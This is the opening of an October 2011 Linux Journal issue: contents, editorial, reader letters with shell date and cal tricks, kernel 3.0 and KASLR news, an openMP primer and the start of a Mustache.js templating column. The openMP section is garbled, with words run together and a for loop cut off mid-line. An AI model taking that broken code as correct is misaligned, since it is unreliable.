
Linux Journal | October 2011 | Issue 210

COLUMNS
24   Reuven M. Lerner's At the Forge: Mustache.js
32   Dave Taylor's Work the Shell: Working with Image Files
36   Kyle Rankin's Hack and /: Practice Hacking on Your Home Router
118  Doc Searls' EOF: Linux Is Latin

REVIEW
54   Return to Solid State, by Kyle Rankin

INDEPTH
98   Remote Viewing—Not Just a Psychic Power
     Linux is a great desktop OS, even when the desktop is on another continent.
     Joey Bernard
104  Packet Sniffing Basics
     To keep your data safe, the best defense is knowing what you can lose, how it can get lost and how to defend against it.
     Adrian Hannah
110  Python in the Cloud
     Tame the cloud with Python.
     Adrian Klaver

IN EVERY ISSUE
8    Current_Issue.tar.gz
10   Letters
14   UpFront
42   New Products
46   New Projects
117  Advertisers Index

ON THE COVER
• Keep Your Data Safe on Public Networks, p. 104
• Hack Your Home Router, p. 36
• ipset for Advanced Firewall Configuration, p. 62
• tcpdump—the Powerful Network Analysis Utility, p. 90
• Deploy a Scalable and High-Performing Distributed Filesystem with Lustre, p. 80
• Reviewed: Intel's 320 SSD Line, p. 54

LINUX JOURNAL (ISSN 1075-3583) is published monthly by Belltown Media, Inc., 2121 Sage Road, Ste. 310, Houston, TX 77056 USA. Subscription rate is $29.50/year. Subscriptions start with the next issue.

WWW.LINUXJOURNAL.COM / OCTOBER 2011 / 5


Subscribe to Linux Journal Digital Edition for only $2.45 an issue.
ENJOY: Timely delivery • Off-line reading • Easy navigation • Phrase search and highlighting • Ability to save, clip and share articles • Embedded videos • Android & iOS apps, desktop and e-Reader versions
SUBSCRIBE TODAY!

Executive Editor: Jill Franklin, jill@linuxjournal.com
Senior Editor: Doc Searls, doc@linuxjournal.com
Associate Editor: Shawn Powers, shawn@linuxjournal.com
Art Director: Garrick Antikajian, garrick@linuxjournal.com
Products Editor: James Gray, newproducts@linuxjournal.com
Editor Emeritus: Don Marti, dmarti@linuxjournal.com
Technical Editor: Michael Baxter, mab@cruzio.com
Senior Columnist: Reuven Lerner, reuven@lerner.co.il
Security Editor: Mick Bauer, mick@visi.com
Hack Editor: Kyle Rankin, lj@greenfly.net
Virtual Editor: Bill Childers, bill.childers@linuxjournal.com

Contributing Editors: Ibrahim Haddad • Robert Love • Zack Brown • Dave Phillips • Marco Fioretti • Ludovic Marcotte • Paul Barry • Paul McKenney • Dave Taylor • Dirk Elmendorf • Justin Ryan

Proofreader: Geri Gale

Publisher: Carlie Fairchild, publisher@linuxjournal.com
General Manager: Rebecca Cassity, rebecca@linuxjournal.com
Advertising Sales Representative: Joseph Torres, ads@linuxjournal.com
Associate Publisher: Mark Irgang, mark@linuxjournal.com
Webmistress: Katherine Druckman, webmistress@linuxjournal.com
Accountant: Candy Beauchamp, acct@linuxjournal.com

Linux Journal is published by, and is a registered trade name of, Belltown Media, Inc.
PO Box 980985, Houston, TX 77098 USA

Editorial Advisory Panel: Brad Abram Baillio • Nick Baronian • Hari Boukis • Steve Case • Kalyana Krishna Chadalavada • Brian Conner • Caleb S. Cullen • Keir Davis • Michael Eager • Nick Faltys • Dennis Franklin Frey • Alicia Gibb • Victor Gregorio • Philip Jacob • Jay Kruizenga • David A. Lane • Steve Marquez • Dave McAllister • Carson McDonald • Craig Oda • Jeffrey D. Parent • Charnell Pugsley • Thomas Quinlan • Mike Roberts • Kristin Shoemaker • Chris D. Stark • Patrick Swartz • James Walker

Advertising: E-MAIL: ads@linuxjournal.com; URL: www.linuxjournal.com/advertising; PHONE: +1 713-344-1956 ext. 2

Subscriptions: E-MAIL: subs@linuxjournal.com; URL: www.linuxjournal.com/subscribe; PHONE: +1 818-487-2089; FAX: +1 818-487-4550; TOLL-FREE: 1-888-66-LINUX; MAIL: PO Box 16476, North Hollywood, CA 91615-9911 USA

LINUX is a registered trademark of Linus Torvalds.




Current_Issue.tar.gz
SHAWN POWERS

SneakerNets and BNC Terminators

I first started my sysadmin career about the time in history when 10BASE2 was beginning to see widespread adoption. ThinNet, as it also was called, meant an affordable transition from the SneakerNet so many businesses used. (SneakerNet is a term for walking floppy disks back and forth between computers—not really a network, but it's how data was moved.) Anyone who remembers those years knows ThinNet was extremely vulnerable to system-wide failures. A single disconnect (or stolen BNC terminator cap at the end of the chain) meant the entire network was down. That was a small price to pay for such inexpensive and blazing-fast speed. 10Mbit was the max speed ThinNet supported, but who in the world ever would need that much throughput?

Networking has changed a lot since my career started, and it's issues like this one that keep me up to date. Kyle Rankin starts off with a hacking primer using an off-the-shelf home router. This isn't merely the old WRT54G hacks you're used to reading about. Instead, Kyle shows us how to don our black hats and really hack in to a D-Link wireless 802.11n router. If Kyle's hacking tutorial makes you a little nervous, don't worry; we have some network security this month as well. Henry Van Styn teaches us some advanced firewall configurations with ipset. Granted, firewalls won't protect anyone from PHP vulnerabilities, but they still help me sleep better at night.

Mike Diehl switches gears, and instead of showing how to hack (or protect) the network, he describes how to create. Specifically, he explains how to create network programs that are cross-platform and easy to build with ENet. As someone whose programming skills peaked with 10 GOTO 10, Mike's idea of "easy" might be relative, but he gives coding examples, so even copy/paste programmers can join in.

Henry Van Styn has another article in this issue on how to use tcpdump to troubleshoot network issues effectively. If you're in charge of a large network, you owe it to yourself to polish your tcpdump skills. It's a tool every network administrator needs, and Henry takes some of the mystery out of it. Adrian Hannah follows in a one-two punch teaching us how to sniff packets effectively. Packet sniffing is one of those skills that can be used for good and evil both, but we'll assume you'll use your powers for good. At the very least, you'll understand what sort of information is available on your network so you can try to secure it a bit.

Networking also has made so many other facets of computing possible. If it weren't for networking, we wouldn't have cloud computing. Adrian Klaver shows how to use Python to work with Amazon Web Services. For some of you, cloud computing is scary, because you never get to access the computer you're working on directly. One way to help alleviate the concern of working on computers far away is to implement remote viewing. Joey Bernard covers several methods for accessing a computer remotely, whether it's in the next room or on the next continent. Granted, that doesn't work for cloud-based services, but it does for remotely hosted servers, so it's an article you'll want to check out.

Our networks are even home to filesystems nowadays, and Petros Koutoupis shows how to deploy the Lustre distributed filesystem. Utilizing multiple nodes for file storage is a great way to leverage your network resources for speed and redundancy. Regardless of your network speed, however, data will travel only as quickly as the hard drive underneath will send it. Kyle Rankin reviews the Intel 320 series SSD this month. If you haven't taken the plunge to SSD, after reading about his results, you might decide that now is the time.

And, of course, for those of you who think networking is good only for accessing your e-mail, we have articles for you this month too. Programmers will like Reuven M. Lerner's article about his mustache—more specifically, Mustache.js, a JavaScript templating system that might be right up your alley. Dave Taylor shows us scripters how to manipulate image files without ever leaving the command line. There's nothing wrong with firing up The GIMP to edit a graphic file, but sometimes you just want to scale an image quickly. Dave explains how.

We've also got new product debuts, Linux news and interesting things I've stumbled across this month in the UpFront section. So whether you're carrying this issue around on a Flash drive (SneakerNet anyone?) or downloading it wirelessly from the wireless router you just hacked, we hope you enjoy it. We certainly enjoyed making it.■

Shawn Powers is the Associate Editor for Linux Journal. He's also the Gadget Guy for LinuxJournal.com, and he has an interesting collection of vintage Garfield coffee mugs. Don't let his silly hairdo fool you, he's a pretty ordinary guy and can be reached via e-mail at shawn@linuxjournal.com. Or, swing by the #linuxjournal IRC channel on Freenode.net.


LETTERS

Fun with Days and Dates

I always enjoy learning tricks from Dave Taylor's Work the Shell column, and I understand that sometimes the example problems need to be somewhat contrived to fit within an article. However, I think he might be thinking too hard about how to determine the day of the week for a date in the past. I use this simple one-liner:

$ date -d "7/20/1969" +"%a"
Sun

You also can use %w for a numeric 0–6 answer:

$ date -d "7/20/1969" +"%w"
0

I also use a variant of this command to convert from "seconds since epoch", which often is found in log files, to a more readable date format:

$ date -d @1234567890
Fri Feb 13 18:31:30 EST 2009

As always, thanks for the tips, Dave. I hope you enjoy these in return.—Alan

Dave Taylor replies: Thanks for the message. The problem is that not all versions of Linux have this more sophisticated date command. I'm old-school. I have no problem with long, complicated solutions anyway.

Calendar Calculation

I have been reading Dave Taylor's command-line column (Work the Shell) in Linux Journal for some time, and I think that, although his command-line solutions are, in many ways, quite useful, it looks like he seems to have some problems with creating algorithms to solve the core portion of the problems. For example, I have no problem with his parsing of the input, or loop controls, in the calendar program, but I think I have come up with a much more effective solution to the portion of the problem related to the determination of the year, by looking at the problem in a different way.

I examined the problem and decided that you don't actually need to search for the day in the calendar itself, in order to determine where it is in its week. All you need to know is what day of the week it will fall on, if you look at the calendar of the given month. To do this, you can examine a generic month and, from that, determine where in the week the month begins. So, I came up with the following solution.

Given: 1) month in which event occurred (month), 2) day of month on which event occurred (dom), 3) day of week on which $dom occurred (dow). Find: year in which $dom occurred on $dow, in $month (year).

1. Label the days of the week as follows: Sun = 6, Mon = 5, ..., Fri = 1, Sat = 0.

2. Assign the value for dow, using the appropriate value, from above.

3. Calculate how many days will be in the first week of the target month:

days=$(( $(( $dom + $dow - 1 )) % 7 + 1 ))

Now, you know how many days are in the first week of this calendar month, in the target calendar year ($days). So, you can find out if the test month matches this value, like this (well, not really, but if you compare the two values, this will tell if you've found the right year). Also, this awk script is predicated on the fact that cal has its first line of days on the third line of its output (FNR == 3):

cal $month $year | awk "FNR == 3 { print NF }"

If this value equals $days, then the current value of $year is the correct year; otherwise, you will have to loop, decrementing $year (by one) at each iteration, until the value for $year is correct. My version of the loop looks like this. Please see if you can make it better! Specifically, I ended up having to create another variable, $caldays (calendar days, the number of days in the first week of the test month). Notice that in order to make even this work, I had to enclose the entire thing in backticks, or I got errors:

while true ; do
    caldays=`cal $month $year | awk "FNR == 3 { print NF }"`
    if [ $caldays -eq $days ] ; then
        cal $month $year
        exit 0 # non-error exit
    else
        year=$(( $year - 1 ))
    fi
done

By the way, the most years you will need to go back is ten (except, of course, when $month=February and $dom=29, in which case, you may have to go back significantly farther, as this condition can occur only in a year divisible by four ($year % 4 -eq 0))!

Also, this version of the program actually prints the calendar for the target month (cal $month $year). I just realized that this script does not check to make certain that the month actually contains $dom, but that realistically should be checked before searching for the existence of the target date, else the input data is/are invalid—that is, September, April, June and November have only 30 days; Feb has 28 (or 29, in leap years) days, and the rest have 31 days, but I know you already knew that.—Dave Johnson

Dave Taylor replies: Thanks for your note and interesting solution. As with any script, there are a number of different solution paths. What I'm really trying to illustrate in my Work the Shell column is the "solution journey" more than how to find and implement the optimal algorithm. I knew from the get-go that there were better mathematical formulas I could use, and indeed, one colleague has assured me that there's a mathematical formula that will solve this puzzle without any invocations of cal or anything like that. I'm unable to find it with Google, but that's another story. In any case, thanks for your smart and interesting solution!

TECH TIP

By combining three useful command-line tools (less, watch and xdotool) along with two xterm windows, you can create an automatically scrolling reader.

Say you have a good book in text-file form ("book.txt") that you just downloaded from Project Gutenberg. Open one xterm and do the usual thing you do when you want to read that book with less:

$ less book.txt

Look at the first few characters in the title line of that xterm's window. (In mine, it was bzimmerly@zt, which is my user ID and the name of the machine I was working on.)

Open another xterm, issue this command, and watch (pun intended) the magic:

$ watch -n 1 xdotool search --name bzimmerly@zt key ctrl+m

The watch command will (every second) issue a "Return" (Ctrl-m) keystroke to the window that has "bzimmerly@zt" as a title, and it will stop only when you interrupt it with Ctrl-c! I think this is neato daddyo! (What can I say? I'm a child of the '60s!)—BILL ZIMMERLY


Correction to Letters

In the Letters section in the September 2011 issue, the letter titled "What Day Is It?", and the script provided therein, was written by Peter Ljubic (not Eric Miller). We apologize for the error.—Ed.

Correction to "Linux Standard Base: State of Affairs"

In our article, "Linux Standard Base: State of Affairs", in the August 2011 issue, one of our timeline graphics reported the addition of Java to LSB 4.0, without mentioning that it was added as a "trial-use" standard (proposed for inclusion, but not required). We regret the error.—Jeff Licquia

Linux in the Wild

This was me, not too long ago, over Aptos, California (Monterey Bay), near my home. It was my fourth tandem jump, but when I went back and looked at the pics, I thought "this should be in LJ!" It's my favorite LJ shirt, "May the source be with you".—Rob Polk

WRITE LJ A LETTER: We love hearing from our readers. Please send us your comments and feedback via www.linuxjournal.com/contact.

At Your Service

SUBSCRIPTIONS: Beginning with the September 2011 issue, subscriptions to Linux Journal will be fulfilled digitally and will be available in a variety of digital formats, including PDF, an on-line digital edition, and apps for iOS and Android devices will be coming soon. Renewing your subscription, changing your e-mail address for issue delivery, paying your invoice, viewing your account details or other subscription inquiries can be done instantly on-line: www.linuxjournal.com/subs. Alternatively, within the US and Canada, you may call us toll-free at 1-888-66-LINUX (54689), or internationally at +1-818-487-2089. E-mail us at subs@linuxjournal.com or reach us via postal mail at Linux Journal, PO Box 16476, North Hollywood, CA 91615-9911 USA. Please remember to include your complete name and address when contacting us.

LETTERS TO THE EDITOR: We welcome your letters and encourage you to submit them at www.linuxjournal.com/contact or mail them to Linux Journal, PO Box 980985, Houston, TX 77098 USA. Letters may be edited for space and clarity.

WRITING FOR US: We always are looking for contributed articles, tutorials and real-world stories for the magazine. An author's guide, a list of topics and due dates can be found on-line: www.linuxjournal.com/author.

FREE e-NEWSLETTERS: Linux Journal editors publish newsletters on both a weekly and monthly basis. Receive late-breaking news, technical tips and tricks, an inside look at upcoming issues and links to in-depth stories featured on www.linuxjournal.com. Subscribe for free today: www.linuxjournal.com/enewsletters.

ADVERTISING: Linux Journal is a great resource for readers and advertisers alike. Request a media kit, view our current editorial calendar and advertising due dates, or learn more about other advertising and marketing opportunities by visiting us on-line: www.linuxjournal.com/advertising. Contact us directly for further information: ads@linuxjournal.com or +1 713-344-1956 ext. 2.


UPFRONT
NEWS + FUN

diff -u
WHAT'S NEW IN KERNEL DEVELOPMENT

Linus Torvalds has decided at last to release Linux version 3.0. For a long time, it seemed as though he might never bump the major version number, because there was no longer any meaning associated with that number. And, indeed, his explanation for the change now ran something along the lines of, Linux is entering its third decade, so why not?

Along with the version bump, Linus has decided to do away with the whole three-numbered versioning system that the kernel has used since time immemorial. So from now on, it'll just be 3.0, 3.1, 3.2 and so on. This is great news for the stable tree maintainers, who were getting tired of version numbers like 2.6.38.4, which as Willy Tarreau said, look more like IP numbers than version numbers.

But, with the kernel going from a three-numbered system to a two-numbered system, a lot of support scripts are breaking. It's Linux's own Y2K bug. Everyone thought 2.6 was going to be the prefix for the rest of time and wrote their scripts accordingly. So along with the version number changes, a lot of fixes are going into the various support scripts.

As soon as the rumor started floating around, Joe Pranevich emerged from a seven-year absence, to announce the "Wonderful World of Linux 3.0" at www.kniggit.net/wwol30. It covers the vast array of changes that occurred throughout the 2.6 time frame, leading up to 3.0.

Matt Domsch announced that Dell was discontinuing the digest forms of the linux-kernel and linux-scsi mailing lists. Although this would affect a few hundred subscribers, he said that changes at the hardware and software level of their mail servers meant that certain features wouldn't be re-implemented, and digests were one of those.

Dan Rosenberg initiated a fascinating discussion about a particular security problem: how to deal with attackers who based their attacks on knowing the location, in RAM, of vulnerable parts of the kernel. His original idea was to have the system migrate the kernel to a new randomized memory location during boot. But over the course of discussion, it turned out there were many hard problems that would have to be solved in that case.

For one thing, it wasn't always clear where to get enough entropy for random number generation—an important issue if one wants to relocate the kernel to a random place in RAM. Also, the 64-bit kernel would load into memory in a different way from the 32-bit kernel, and so it would have to be handled differently by Dan's code. Also, if the kernel were in a random location, something would have to be done to oops report generation to make sure the memory references would make sense to someone reading them. Even more dangerous was the fact that other parts of the system already would be in memory at the time the kernel was being relocated, and there was a real danger of clobbering those parts, which would kill the system. Hibernation also was an issue, because the existing hibernation code in the kernel made assumptions about the awakening system that Dan's code violated.

Eventually, it became clear that although Dan's goal was a good one—making it more difficult to predict where in RAM the vulnerable parts of the kernel could be found—there were just too many technical difficulties to make it feasible in the way he was planning to do it. Linus Torvalds and H. Peter Anvin each came up with alternative approaches that might be easier to implement, while still accomplishing essentially the same goal.

Linus' idea was to relink the kernel binary with a random piece of data to offset the kernel randomly in RAM that way. H. Peter's idea was more radical. He wanted to convert the core kernel code into a set of kernel modules. At that point, the init code could load the various modules anywhere it wanted, even in noncontiguous RAM. So, he set out to implement that in the syslinux bootloader.

Although no clear direction emerged for what would ultimately go into the kernel, it seems as though a number of good ideas will be pursued. Almost certainly, the kernel's location in RAM will be randomized in some way, before too long.—ZACK BROWN

LinuxJournal.com

Have you visited us at LinuxJournal.com lately? You might be missing out on some great information if you haven't. Our on-line publication's frequent, Web-exclusive posts will provide you with additional tips and tricks, reviews and news that you won't find here, so make sure to visit us regularly at LinuxJournal.com. In case you missed them, here are a few of the most popular recent posts to get you started:

■ "Fun with ethtool": www.linuxjournal.com/content/fun-ethtool
■ "Wi-Fi on the Command Line": www.linuxjournal.com/content/wi-fi-command-line
■ "Review: Recompute Cardboard PC": www.linuxjournal.com/video/review-recompute-cardboard-pc
■ "5 Myths About OpenOffice.org/LibreOffice": www.linuxjournal.com/content/5-myths-about-openofficeorg-libreoffice
■ "Why Hulu Plus Sucks, and Why You Should Use It Anyway": www.linuxjournal.com/content/why-hulu-plus-sucks-and-why-you-should-use-it-anyway
■ "The Arch Way": www.linuxjournal.com/content/arch-way

—KATHERINE DRUCKMAN


Non-Linux FOSS

Many Windows or Macintosh users are perfectly happy to download their podcasts with iTunes or something similar. Here at Linux Journal, however, we like to offer open-source alternatives. Enter Juice. Juice is a cross-platform, open-source application for downloading podcasts.

Juice is fast, efficient and very feature-rich. Our favorite feature is the built-in directory with thousands of podcast feeds from which to choose. Add things like auto cleanup, centralized feed management and accessibility options, and you have an awesome tool for getting your audio information fix. Check it out for Windows, Mac OS or Linux at juicereceiver.sourceforge.net.—SHAWN POWERS

ClearOS

All-in-one Linux-based network servers aren't a new concept. Distributions like Clark Connect have been around for many years and fit their niche quite well. Lately, however, there seems to be a new batch of all-in-one solutions that offer a similar business model.

A couple months ago, we reviewed Untangle, which is a commercial distribution offering a feature-limited free version. Recently, one of our readers, Tracy Holz, pointed me to a similar project, ClearOS. Although Untangle is largely a firewall and network services system, ClearOS attempts to do more. Using a combination of open-source and commercial tools, it can be a one-stop server platform for many networks.

ClearOS has a unique modular system that seamlessly includes local server applications and cloud-based services to end users. You can purchase appliance devices or install ClearOS on an existing server. Much like Untangle, ClearOS's free features are limited, but it doesn't feel crippled if you stick to just the free stuff. The features and add-ons are too numerous to list here, but if you're looking for a commercially backed all-in-one server solution for your network, check out ClearOS: www.clearfoundation.com. Tell 'em Tracy sent you.—SHAWN POWERS


Google Plus

The early years of the 21st century forever will be known as the age of social media. I don't know if that's something we should be proud of, but nonetheless, here we are. During the past decade, we've seen things like Friendster, Pownce, Twitter, Wave, Facebook, Tumblr, Buzz, Gowalla, Brightkite, Foursquare, Loopt, Plurk, Identi.ca, LinkedIn, Yammer and now Google Plus.

Google hasn't had a great track record when it comes to social networking, with both Wave and Buzz being largely unsuccessful. Google Plus, or G+, seems to be its most appealing offer so far. At the time of this writing, it's still very early in the beta stages, but it already seems to have a cleaner and simpler interface than its direct competitor: Facebook.

Google offers unique features like group video chats called "hangouts" and "circles" of friends to help organize your following/followers. G+'s integration with other Google services may be the kill shot. Gmail, Picasa, YouTube and Blogger easily can be integrated directly by Google, making it simple for those folks already using Google apps to get their Plus on. Is the third time a charm for Google, or will G+ be another unfortunate carcass in the pile of outdated social media platforms? Only time will tell.—SHAWN POWERS

Kickstarter for Open-Source Projects?

The Web site www.kickstarter.com is an interesting place. Basically, it's a site that allows people to invest in various projects, giving people real money to develop an idea. Those ideas vary from film-making to programming video games, but the concept is the same regardless of the project.

What is the motivation for investing in someone's idea? That's the beauty; it depends on the project. Maybe it's an M.C. Frontalot album you want to see created, so you give money to the project so the album is produced. Perhaps it's a video game you'd really like to play, so you give money to the developer to make the game. Perhaps the developer gives a copy of the game to all investors. Perhaps not. There are no rules, just collaboration.

Recently, we've seen open-source projects use Kickstarter, and it seems like a great idea. If you see a program idea you like, send money, and if the creators reach their goals, they'll create the programs. Because it's open source, the benefit is obvious: you get to use the program when it's complete.

Granted, it's not a perfect system. It certainly would be possible to abuse it. It seems that actually funding open-source developers is a good idea though. Perhaps this method of funding is a fad, or maybe it's the start of something great—paying developers to develop free software. If it works, it seems like everyone wins.—SHAWN POWERS


[ UPFRONT ]Big-Box ScienceA few months ago, I wrote a piece abouthow you can use MPI to run a parallelprogram over a number of machines thatare networked together. But more and moreoften, your plain-old desktop has more thanone CPU. How best can you take advantageof the amount of power at your fingertips?When you run a parallel program on onesingle machine, it is called shared-memoryparallel programming. Several optionsare available when doing shared-memoryprogramming. The most common arepthreads and openMP. This month, I take alook at openMP and how you can use it toget the most out of your box.openMP is a specification, whichmeans you end up actually using animplementation. It is implemented as anextension to a compiler. So, in order touse it in your code, you simply need toadd a compiler flag. There is no linkingin of external libraries. openMP directivesare added to your program as specialcomments. This means if you try to compileyour program with a compiler that doesn’tunderstand openMP, it should compilefine. The openMP directives will appearjust like any other comment, and you willend up with a single-threaded program.Implementations for openMP are availableunder C/C++ and FORTRAN.The most basic concept in openMP is thatonly sections of your code are run in parallel,and, for the most part, these sections all runthe same code. Outside of these sections, yourprogram will run single-threaded. The mostbasic parallel section is defined by:#pragma omp parallelin C/C++, or:!OMP PARALLELin FORTRAN. This is called a parallel openMPpragma. Almost all of the other pragmas that youare likely to use are built off this.The most common pragma you will see is theparallel loop. In C/C++, this refers to a for loop.In FORTRAN, this is a do loop. (For the rest of thispiece, I stick to C/C++ as examples. There areequivalent FORTRAN statements you can find inthe specification documentation.) A C/C++ loopcan be parallelized with:#pragma omp parallel forfor (i=0; i


With four CPUs, this for loop should take approximately one-fourth the time it normally takes.

Does this work with all for loops? No, not necessarily. In order for the openMP subsystem to be able to divide up the for loop, it needs to know how many iterations are involved. This means you can't use any commands that would change the number of iterations around the for loop, including things like "break" or "return" in C/C++. Both of these drop you out of the for loop before it finishes all of the iterations. You can use a "continue" statement, however. All that does is jump over the remaining code in this iteration and place you at the beginning of the next iteration. Because this preserves the iteration count, it is safe to use.

By default, all of the variables in your program have a global scope. Thus, when you enter a parallel section, like the parallel for loop above, you end up having access to all of the variables that exist in your program. Although this is very convenient, it is also very, very dangerous. If you look back at my short example, the work is being done by the line:

area += i;

You can see that the variable area is being read from and written to. What happens now if you have several threads, all trying to do this at the same time? It is not very pretty—think car pileup on the freeway. Imagine that the variable area starts with a value of zero. Then, your program starts the parallel for loop with five threads and they all read in the initial value of zero. Then, they each add their value of i and save it back to memory. This means that only one of these five


actually will be saved, and the rest essentially will be lost. So, what can you do? In openMP, there is the concept of a critical section. A critical section is a section of your code that's protected so that only one thread can execute it at a time. To fix this issue, you could place the area incrementing within a critical section. It would look like this:

#pragma omp parallel for
for (i=0; i<max; i++) {
   #pragma omp critical
   area += i;
}


Setting the number of threads to use from your shell would look like:

export OMP_NUM_THREADS=4

Within a parallel section, you also can control whether each thread gets its own copy of a variable with the private and firstprivate clauses:

a = 10;
#pragma omp parallel for private(j) firstprivate(a)
for (i=0; i<max; i++) {
   /* ...loop body using the thread-private copies of a and j... */
}


They Said It

"Be as smart as you can, but remember that it is always better to be wise than to be smart."—Alan Alda

"Being an intellectual creates a lot of questions and no answers."—Janis Joplin

"Failure is simply the opportunity to begin again, this time more intelligently."—Henry Ford

"Genius is more often found in a cracked pot than in a whole one."—E. B. White

"It's not that I'm so smart, it's just that I stay with problems longer."—Albert Einstein

"Man is the most intelligent of the animals—and the most silly."—Diogenes

"The surest sign that intelligent life exists elsewhere in the universe is that it has never tried to contact us."—Bill Watterson


COLUMNS / AT THE FORGE

Mustache.js
REUVEN M. LERNER

Looking for a JavaScript templating system? Mustache.js might be right for you.

The past few articles, I've looked at a number of uses for JavaScript, on both the server and the client. I hope to continue my exploration of such systems, particularly on the client side, in the coming months. But for now, I want to tackle a more mundane problem that JavaScript programmers encounter all the time: the fact that JavaScript doesn't have any native string-interpolation mechanism. Sure, you always can use the + operator to concatenate strings:

"hello, " + "world"

which gives you the string:

"hello, world"

which is what you might expect. But, what if you have a variable "username", and you want to say "hello" to the user in a friendly way? In Ruby, you would use:

"hello, #{username}"

And in Python, you would write:

"hello, %s" % username

But in JavaScript, you're basically stuck typing:

"hello, " + username

which isn't so terrible if you have one variable at the end of the string. But the more I'm working with JavaScript, the more I'd like to have more sophisticated string interpolation. While I'm wishing, I'd like to have all sorts of text-formatting and templating capabilities that I'm used to from other languages or from various Web frameworks.

Now, this doesn't sound like a tall order. And heaven knows, I've used a lot of templating systems during the years, so I know that it's not very hard to create one—especially if the standards aren't very high. But as Web applications become more heavily focused on the browser, and on JavaScript, you'll need a templating solution that allows you to work easily in that environment.

Fortunately, several templating systems exist. One of the most prominent and interesting is Mustache.js, a JavaScript implementation of the Mustache templating system that is available for many different languages. In contrast with most


other templates I've used, Mustache.js is not a fully fledged programming language, as you might expect. Rather, it's a tightly defined domain-specific language that describes the page, but that doesn't have the potential to make templates into another code repository. So, this article explores Mustache.js—how to install and use it, as well as when it's appropriate and how to use a few of the more-advanced features that come with it.

Templates

Many readers probably are familiar with a typical sort of template, with a style used by PHP, ASP, JSP and Ruby's ERb. Anything that should be executed goes in braces that look like this:

<% code %>

And, anything you want to display on the screen gets nearly the same sort of tag, but with an = sign on the left:

<%= value %>

The good news with such templates is that they're rather easy to use. You don't have to worry about which symbols mean what, or set up a file just to see some interpolated variables. But on the other hand, they're too simple for producing large-scale reports and certainly for doing serious text manipulation.

The other problem is that as soon as you put code into your template, you're violating the rule of MVC, which is that you don't want to put very much executable code in your template. Assigning variables isn't a good idea, but calling methods, not to mention retrieving rows from the database, is something you normally don't want to be doing within your views. But, you can be even stricter in how you interpret this no-execution policy. What if you could avoid all executable code, including if/then statements, loops and other things to which you're accustomed?

Mustache adopts this philosophy in that it allows for a limited set of things to take place within the template. You could argue (and I'd probably believe you) that it's going too far to say, as the Mustache slogan says, that they're "logic-less templates". Indeed, Mustache templates do have a fair amount of logic in them.
But the nature of the templating language ensures that the special functions cannot be abused too terribly. If you want to execute code, you'll have to do it outside the realm of Mustache. (If you're wondering, it's called Mustache because it uses double-curly braces, {{ and }}, as delimiters. Double-curly braces indicate where you want interpolation to take place, and they also delimit various control structures.)

Installing Mustache.js couldn't be easier. Download the single mustache.js file from GitHub, put it in an appropriate directory inside the JavaScript directory for your Web


Listing 1. Simple Use of Mustache

<html>
<head>
<title>Testing</title>
<script src="jquery.js"></script>
<script src="mustache.js"></script>
<script>
$(document).ready(function () {
    var template_vars = {
        name: 'Reuven',
        number_of_children: 3
    }

    var template = "{{name}} has {{number_of_children}} children.";
    var html = Mustache.to_html(template, template_vars);
    $('#target').html(html);
});
</script>
</head>
<body>
<h1>Testing testing</h1>
<p>This is a paragraph</p>
<div id="target">This space for rent</div>
</body>
</html>

application—or alongside your HTML file, if you're just experimenting with it outside a framework—and you're ready to go.

Note that the inclusion of Mustache.js doesn't turn your HTML file (or your JavaScript file, for that matter) into a Mustache template. Rather, it provides you with a number of functions that can be


Listing 2. Replace Text in the Template

<html>
<head>
<title>Testing</title>
<script src="jquery.js"></script>
<script src="mustache.js"></script>
<script>
$(document).ready(function () {
    var template_vars = {
        proper_noun: 'Reuven',
        color: 'green',
        food: 'ice cream'
    }

    $(".template").each(function(index, value) {
        var current_html = $(this).html();
        var translated = Mustache.to_html(current_html, template_vars);
        $(this).html(translated);
    });
});
</script>
</head>
<body>
<h1>Testing testing</h1>
<p>This is a paragraph</p>
<p class="template">My name is {{proper_noun}}.
I like to wear {{color}} shirts,
and eat {{food}} for breakfast.</p>
</body>
</html>


applied to text strings. You then can do whatever you want with those text strings, from inserting them into a file to using them for further processing.

Listing 1 contains a simple example of using Mustache.js. At the top of the <head> section, I include both the jQuery library and Mustache.js, as I often would in an HTML file. I then have a bit of JavaScript code executing in the standard $(document).ready function call, ensuring that it will be executed only after jQuery has detected that the entire HTML document has loaded. This avoids a race condition, in which the JavaScript might or might not run before the HTML has been rendered.

I then define a variable (template_vars), a JavaScript object with two properties, "name" and "number_of_children". These properties can be of any data type, including a function. If a property is a function, it is evaluated when interpolated, and the result of the function's evaluation is inserted into the template.

I've then broken up the interpolation into three distinct parts. First, I define the text (the "template" variable) into which I want to interpolate variables. Notice how the string is a tiny template, and that anything within {{ }} (double-curly braces) is evaluated as a variable by Mustache.js.

Next, you apply your template_vars to the template, getting some HTML back. You then can do whatever you want with that HTML, including (most easily) replacing the text from an existing HTML tag. You also could have created a new node, replaced an existing one or modified the text even further. In the end, I did something fairly simple, namely using jQuery's "html" function to replace the existing HTML with the improved version.

For something a bit more complex, which resembles traditional HTML templates a bit more, consider Listing 2. In this example, I decided to do a Mad Libs sort of replacement, but instead of changing text in a string, I changed it in the document itself. Using jQuery's selectors, I chose all elements with a "template" class.
(This allows the author of the page to decide whether the {{ }} tags will be used on a particular tag.)

Perhaps the most interesting and important part of this code is the callback function I used to do the translation. Rather than using a typical jQuery loop, which would have turned into a rat's nest of code, I decided to use the "each" function, which iterates over a collection. In each iteration, $(this) refers to the item, and you next use the Mustache.to_html function to translate it, and then replace the text with its transformed self. In this way, your JavaScript easily can affect the text on the page.

What happens if you ask Mustache to use a variable value that you have not defined? It continues silently, using an empty string. This means that if your template_vars variable contains one or more keys with misspelled names, you won't get any warnings.
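That silent empty-string behavior is easy to see with a toy stand-in for Mustache's variable interpolation (this is an illustration only, not the real library's code; the function name toHtml is mine):

```javascript
// Toy version of {{variable}} interpolation, mimicking the behavior
// described above: function values are evaluated, missing keys become "".
function toHtml(template, vars) {
    return template.replace(/\{\{(\w+)\}\}/g, function (match, key) {
        var value = vars[key];
        if (typeof value === "function")
            value = value();                  // evaluated when interpolated
        return value === undefined ? "" : String(value);
    });
}

console.log(toHtml("{{name}} has {{number_of_children}} children.",
                   { name: "Reuven", number_of_children: 3 }));
// -> Reuven has 3 children.

console.log(toHtml("{{nmae}} has 3 children.", { name: "Reuven" }));
// -> " has 3 children."  (misspelled key, silently empty)
```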


Listing 3. Loops

<html>
<head>
<title>Testing</title>
<script src="jquery.js"></script>
<script src="mustache.js"></script>
<script>
$(document).ready(function () {
    var template_vars = {
        name: 'Reuven',
        children: ['Atara', 'Shikma', 'Amotz']
    }

    var template = "{{name}} has children named: {{#children}}{{.}} {{/children}}.";
